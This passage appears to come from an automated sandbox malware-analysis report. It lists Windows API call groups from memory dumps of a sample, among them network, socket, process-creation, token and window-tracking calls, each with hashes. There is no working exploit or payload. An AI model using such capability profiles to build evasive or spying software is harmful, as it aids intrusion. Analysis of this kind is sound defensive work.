                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AE4038
                                                              • __isleadbyte_l.LIBCMT ref: 00AE4066
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00AE4094
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00AE40CA
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: 3c3a4cb058e5eac7b5f477d7fb081263fb3137d7f60f91718fb7a13887415e83
                                                              • Instruction ID: 74eeecca6f0bd363002f767a5ced5539f69e8f930d40b33061b9501e9903b892
                                                              • Opcode Fuzzy Hash: 3c3a4cb058e5eac7b5f477d7fb081263fb3137d7f60f91718fb7a13887415e83
                                                              • Instruction Fuzzy Hash: 1931B031600286EFDF219F76C844BBA7BB9BF48320F154439E6658B1A1E735E890DB90
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 00B17CB9
                                                                • Part of subcall function 00AF5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AF5F6F
                                                                • Part of subcall function 00AF5F55: GetCurrentThreadId.KERNEL32 ref: 00AF5F76
                                                                • Part of subcall function 00AF5F55: AttachThreadInput.USER32(00000000,?,00AF781F), ref: 00AF5F7D
                                                              • GetCaretPos.USER32(?), ref: 00B17CCA
                                                              • ClientToScreen.USER32(00000000,?), ref: 00B17D03
                                                              • GetForegroundWindow.USER32 ref: 00B17D09
                                                              Similarity
                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                              • String ID:
                                                              • API String ID: 2759813231-0
                                                              • Opcode ID: 2e19acefa457c28b7675b986a073cd41a349a5a7a3ff0faec92e1d95edb1f0da
                                                              • Instruction ID: 65a31e4e4b47b7d51bfcbfe54076dfad0b6dbcbf15b42de683fa18e650971554
                                                              • Opcode Fuzzy Hash: 2e19acefa457c28b7675b986a073cd41a349a5a7a3ff0faec92e1d95edb1f0da
                                                              • Instruction Fuzzy Hash: 15311E71D00108AFDB10EFA9D985DEFBBF9EF58314B11846AF915E7211DA319E058BA0
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • GetCursorPos.USER32(?), ref: 00B1F211
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B2E4C0,?,?,?,?,?), ref: 00B1F226
                                                              • GetCursorPos.USER32(?), ref: 00B1F270
                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B2E4C0,?,?,?), ref: 00B1F2A6
                                                              Similarity
                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                              • String ID:
                                                              • API String ID: 2864067406-0
                                                              • Opcode ID: 855bf2fb9c6e2c410b926e6d0c4ab81867667a38ba32991fbe92811255210f37
                                                              • Instruction ID: ff17fefdabb21bc1c5c98df221d09b7056f25af5aa6ba95d6ff1af678b125601
                                                              • Opcode Fuzzy Hash: 855bf2fb9c6e2c410b926e6d0c4ab81867667a38ba32991fbe92811255210f37
                                                              • Instruction Fuzzy Hash: 2A21B139500028AFCB258F98D859EFE7BF5FF0A710F5480A9F9094B2A5D7319D90DBA0
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B04358
                                                                • Part of subcall function 00B043E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B04401
                                                                • Part of subcall function 00B043E2: InternetCloseHandle.WININET(00000000), ref: 00B0449E
                                                              Similarity
                                                              • API ID: Internet$CloseConnectHandleOpen
                                                              • String ID:
                                                              • API String ID: 1463438336-0
                                                              • Opcode ID: 1182b834f0721ea57d84c86c9ed25bb7f925543212e6d5da27020b4a10467eb5
                                                              • Instruction ID: 33e01fd87cfc9577f8fadc459b6dcf2ffb185b692c768cbfc5ccfeacdd0cde64
                                                              • Opcode Fuzzy Hash: 1182b834f0721ea57d84c86c9ed25bb7f925543212e6d5da27020b4a10467eb5
                                                              • Instruction Fuzzy Hash: DE21D1B5200A01BBEB129F60EC41FBBBBE9FF44710F10506AFB1597690DB71A8209B94
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00B18AA6
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B18AC0
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B18ACE
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B18ADC
                                                              Similarity
                                                              • API ID: Window$Long$AttributesLayered
                                                              • String ID:
                                                              • API String ID: 2169480361-0
                                                              • Opcode ID: d275d06d79c9314788ae2f271f925738397efdae3351140fac41f200d8ff4f24
                                                              • Instruction ID: 490bf93519c255082ce774d361af49a8ac17d8f0df7a5da548af132a040c73fa
                                                              • Opcode Fuzzy Hash: d275d06d79c9314788ae2f271f925738397efdae3351140fac41f200d8ff4f24
                                                              • Instruction Fuzzy Hash: B2119731215510AFDB04AB28DD05FAA77ADBF85320F28815AF926C72A2CF60AC408B90
                                                              APIs
                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00B08AE0
                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00B08AF2
                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00B08AFF
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00B08B16
                                                              Similarity
                                                              • API ID: ErrorLastacceptselect
                                                              • String ID:
                                                              • API String ID: 385091864-0
                                                              • Opcode ID: 6b8b88a8467385997d368d197f97f6deef8e3f5847cfed9ef9684d50fc48bb5e
                                                              • Instruction ID: a2513c1c8950ca7d284fdfec25e49faf9c29d19664ea61a7ba30116e3f58aa45
                                                              • Opcode Fuzzy Hash: 6b8b88a8467385997d368d197f97f6deef8e3f5847cfed9ef9684d50fc48bb5e
                                                              • Instruction Fuzzy Hash: 85216372A001249FC7219F69D985A9EBBECEF49350F1081AAF849D7291DF749E418F90
                                                              APIs
                                                                • Part of subcall function 00AF1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00AF0ABB,?,?,?,00AF187A,00000000,000000EF,00000119,?,?), ref: 00AF1E77
                                                                • Part of subcall function 00AF1E68: lstrcpyW.KERNEL32(00000000,?,?,00AF0ABB,?,?,?,00AF187A,00000000,000000EF,00000119,?,?,00000000), ref: 00AF1E9D
                                                                • Part of subcall function 00AF1E68: lstrcmpiW.KERNEL32(00000000,?,00AF0ABB,?,?,?,00AF187A,00000000,000000EF,00000119,?,?), ref: 00AF1ECE
                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00AF187A,00000000,000000EF,00000119,?,?,00000000), ref: 00AF0AD4
                                                              • lstrcpyW.KERNEL32(00000000,?,?,00AF187A,00000000,000000EF,00000119,?,?,00000000), ref: 00AF0AFA
                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00AF187A,00000000,000000EF,00000119,?,?,00000000), ref: 00AF0B2E
                                                              Strings
                                                              Similarity
                                                              • API ID: lstrcmpilstrcpylstrlen
                                                              • String ID: cdecl
                                                              • API String ID: 4031866154-3896280584
                                                              • Opcode ID: a36dbf699c974804e60d3eea389c99fea0e1aa36bd296707701cb562976f95ca
                                                              • Instruction ID: ac7064cc11690e1e6d3ab3df06c59131965b312e28326ed3bb52ba75f7ab6705
                                                              • Opcode Fuzzy Hash: a36dbf699c974804e60d3eea389c99fea0e1aa36bd296707701cb562976f95ca
                                                              • Instruction Fuzzy Hash: 7B119036200309AFDB25AF74DC45E7A77A9FF45354B90406AFA06CB2A5EB719850C7A0
                                                              APIs
                                                              • _free.LIBCMT ref: 00AE2FB5
                                                                • Part of subcall function 00AD395C: __FF_MSGBANNER.LIBCMT ref: 00AD3973
                                                                • Part of subcall function 00AD395C: __NMSG_WRITE.LIBCMT ref: 00AD397A
                                                                • Part of subcall function 00AD395C: RtlAllocateHeap.NTDLL(00C70000,00000000,00000001,00000001,00000000,?,?,00ACF507,?,0000000E), ref: 00AD399F
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 39f1a547b9e404448f253561c3c471a3e1ac64448c9b4ca84e53da5d0ed04f6a
                                                              • Instruction ID: 18631fbddc212ca031a718f5768f59fee4abed1eba71dcf195f2cdea7b10f6d3
                                                              • Opcode Fuzzy Hash: 39f1a547b9e404448f253561c3c471a3e1ac64448c9b4ca84e53da5d0ed04f6a
                                                              • Instruction Fuzzy Hash: 4E110A32419252AFDF313B75AD1976E3BA8AF40360F204826F80A97251EF30CD508B90
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00AF05AC
                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00AF05C7
                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00AF05DD
                                                              • FreeLibrary.KERNEL32(?), ref: 00AF0632
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                              • String ID:
                                                              • API String ID: 3137044355-0
                                                              • Opcode ID: 0fb96bb34cec243a588f97b6217d7ea02769a61c205bba82571ebd1b6f6e655f
                                                              • Instruction ID: c4e92f4b14a74158f1a2a254f88d7807ca8ec2f34a5ebb270e5acc221e139264
                                                              • Opcode Fuzzy Hash: 0fb96bb34cec243a588f97b6217d7ea02769a61c205bba82571ebd1b6f6e655f
                                                              • Instruction Fuzzy Hash: A621597190020DAFDB608FD5ED88EEABBB8EB40700F108469B616D6151EBB0EA559B50
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AF6733
                                                              • _memset.LIBCMT ref: 00AF6754
                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00AF67A6
                                                              • CloseHandle.KERNEL32(00000000), ref: 00AF67AF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                              • String ID:
                                                              • API String ID: 1157408455-0
                                                              • Opcode ID: 06290ba5881e0e081f43f1796d5c3495f41a5130d854c6594a50a18a7587a609
                                                              • Instruction ID: e7805fbb520efc53cfe9ab246e9cfb4b64e4ff9357997f20c4ed446352b8a1b0
                                                              • Opcode Fuzzy Hash: 06290ba5881e0e081f43f1796d5c3495f41a5130d854c6594a50a18a7587a609
                                                              • Instruction Fuzzy Hash: 3B110A71901228BAE7306BA5AC4DFAFBABCEF44724F10419AF505E71C0D6704E808B64
                                                              APIs
                                                                • Part of subcall function 00AEAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AEAA79
                                                                • Part of subcall function 00AEAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AEAA83
                                                                • Part of subcall function 00AEAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AEAA92
                                                                • Part of subcall function 00AEAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AEAA99
                                                                • Part of subcall function 00AEAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AEAAAF
                                                              • GetLengthSid.ADVAPI32(?,00000000,00AEADE4,?,?), ref: 00AEB21B
                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AEB227
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00AEB22E
                                                              • CopySid.ADVAPI32(?,00000000,?), ref: 00AEB247
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                              • String ID:
                                                              • API String ID: 4217664535-0
                                                              • Opcode ID: 4bf1965308ca43e8a48670c7fbde4b064a56a3673648b51fedcc1d2feff18c48
                                                              • Instruction ID: 461a7af7bccd1ecac7a6aedebdb2f924ea1de3323dbc0611b38091d0d069d078
                                                              • Opcode Fuzzy Hash: 4bf1965308ca43e8a48670c7fbde4b064a56a3673648b51fedcc1d2feff18c48
                                                              • Instruction Fuzzy Hash: 3E119171A11205FFDB04EFA9DD99AAFB7B9EF85304F14802DEA4297210D731AE44DB20
                                                              APIs
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00AEB498
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AEB4AA
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AEB4C0
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AEB4DB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: da3aa0b6a3f5c6d7be5d9c506e617dadf695da09d18b34c4dc57808442a0dc8a
                                                              • Instruction ID: 9bc359d1bf8d7da2bba0fb8d66b1f9856e3045af5a823cb58b037e6dd617189b
                                                              • Opcode Fuzzy Hash: da3aa0b6a3f5c6d7be5d9c506e617dadf695da09d18b34c4dc57808442a0dc8a
                                                              • Instruction Fuzzy Hash: 9B112A7A900218FFEB11DFA9C985E9EBBB4FB08710F204091E604B7295D771AE11DBA4
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00ACB5A5
                                                              • GetClientRect.USER32(?,?), ref: 00B2E69A
                                                              • GetCursorPos.USER32(?), ref: 00B2E6A4
                                                              • ScreenToClient.USER32(?,?), ref: 00B2E6AF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                              • String ID:
                                                              • API String ID: 4127811313-0
                                                              • Opcode ID: 3f7cc20d512798390fac75459215d54be6a098fdc7988ef4b4e342e6028d2bc7
                                                              • Instruction ID: 83b6d7019b48c6463b23e4e989b0a7e616939600fec2232024237fc2c23dee64
                                                              • Opcode Fuzzy Hash: 3f7cc20d512798390fac75459215d54be6a098fdc7988ef4b4e342e6028d2bc7
                                                              • Instruction Fuzzy Hash: BA113631910029BFCB10DFA8E946DEE7BB9EB08305F110895F916E7140D730AA96CBB1
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00AF7352
                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00AF7385
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AF739B
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AF73A2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 2880819207-0
                                                              • Opcode ID: 9fbbd1eeb66690211b26ec593bb98c72189c56d14584ce0f4533db74e5c06ab4
                                                              • Instruction ID: 110835573549ef6809fc64fd5ea9257df769648c0c73bf9b4a5e10784f10dddd
                                                              • Opcode Fuzzy Hash: 9fbbd1eeb66690211b26ec593bb98c72189c56d14584ce0f4533db74e5c06ab4
                                                              • Instruction Fuzzy Hash: E2112BB2A04209BFC7019FACDC05EAE7BED9B44310F244315F925D3251DB708D0097A0
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ACD1BA
                                                              • GetStockObject.GDI32(00000011), ref: 00ACD1CE
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00ACD1D8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CreateMessageObjectSendStockWindow
                                                              • String ID:
                                                              • API String ID: 3970641297-0
                                                              • Opcode ID: 9a8749d2f598796ab7cc87ad7b3e0ca1d407240465fc5528cff65009c7a5260f
                                                              • Instruction ID: 02a63d44e317e12b8c4e87f214453f946c81e89f3e0a8fc7bf55d97ee7459035
                                                              • Opcode Fuzzy Hash: 9a8749d2f598796ab7cc87ad7b3e0ca1d407240465fc5528cff65009c7a5260f
                                                              • Instruction Fuzzy Hash: B611C072101509BFEF024FA4EC55EEABB69FF09364F190229FA1452150CB31DC60DBA0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                              • String ID:
                                                              • API String ID: 3016257755-0
                                                              • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                              • Instruction ID: 9356a4bd10974255f11dcb6550a2b9b7d0d4e3735bb577f469fdf79100e46305
                                                              • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                              • Instruction Fuzzy Hash: 91014B3640018ABBCF126F95DD168EE3F2BBB1C354B588455FA2859031D336CAB1AB81
                                                              APIs
                                                                • Part of subcall function 00AD7A0D: __getptd_noexit.LIBCMT ref: 00AD7A0E
                                                              • __lock.LIBCMT ref: 00AD748F
                                                              • InterlockedDecrement.KERNEL32(?), ref: 00AD74AC
                                                              • _free.LIBCMT ref: 00AD74BF
                                                              • InterlockedIncrement.KERNEL32(00C84A10), ref: 00AD74D7
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                              • String ID:
                                                              • API String ID: 2704283638-0
                                                              • Opcode ID: b2a7e9c83bdefd7b89ea1b420860e2a75badc563a0c8825c7ed1eb0a7cb4d9a5
                                                              • Instruction ID: e6be1b13b57b0a4836e75cea09cec53f9167c56d1df0f7b28101042e15837426
                                                              • Opcode Fuzzy Hash: b2a7e9c83bdefd7b89ea1b420860e2a75badc563a0c8825c7ed1eb0a7cb4d9a5
                                                              • Instruction Fuzzy Hash: 5B01D672909621ABCB1BAF24A60675DBB70BF04710F14410BF81673790EB345D40CFC6
                                                              APIs
                                                              • __lock.LIBCMT ref: 00AD7AD8
                                                                • Part of subcall function 00AD7CF4: __mtinitlocknum.LIBCMT ref: 00AD7D06
                                                                • Part of subcall function 00AD7CF4: EnterCriticalSection.KERNEL32(00000000,?,00AD7ADD,0000000D), ref: 00AD7D1F
                                                              • InterlockedIncrement.KERNEL32(?), ref: 00AD7AE5
                                                              • __lock.LIBCMT ref: 00AD7AF9
                                                              • ___addlocaleref.LIBCMT ref: 00AD7B17
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 1687444384-0
                                                              • Opcode ID: d0980ac4f1359861b6f1f9c2de5b596f5d9450c77c1dc65db86fb840ca4c712e
                                                              • Instruction ID: f7fbc9d52278558248412b0546e169c9d60f8054d0f0c00a09e3f8e149391ac7
                                                              • Opcode Fuzzy Hash: d0980ac4f1359861b6f1f9c2de5b596f5d9450c77c1dc65db86fb840ca4c712e
                                                              • Instruction Fuzzy Hash: 4E015772405B00AED7209F75DA0674ABBF0EF40325F20894FE4AB973A0DBB4A680CB01
                                                              APIs
                                                              • _memset.LIBCMT ref: 00B1E33D
                                                              • _memset.LIBCMT ref: 00B1E34C
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B73D00,00B73D44), ref: 00B1E37B
                                                              • CloseHandle.KERNEL32 ref: 00B1E38D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseCreateHandleProcess
                                                              • String ID:
                                                              • API String ID: 3277943733-0
                                                              APIs
                                                                • Part of subcall function 00ACAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00ACAFE3
                                                                • Part of subcall function 00ACAF83: SelectObject.GDI32(?,00000000), ref: 00ACAFF2
                                                                • Part of subcall function 00ACAF83: BeginPath.GDI32(?), ref: 00ACB009
                                                                • Part of subcall function 00ACAF83: SelectObject.GDI32(?,00000000), ref: 00ACB033
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B1EA8E
                                                              • LineTo.GDI32(00000000,?,?), ref: 00B1EA9B
                                                              • EndPath.GDI32(00000000), ref: 00B1EAAB
                                                              • StrokePath.GDI32(00000000), ref: 00B1EAB9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
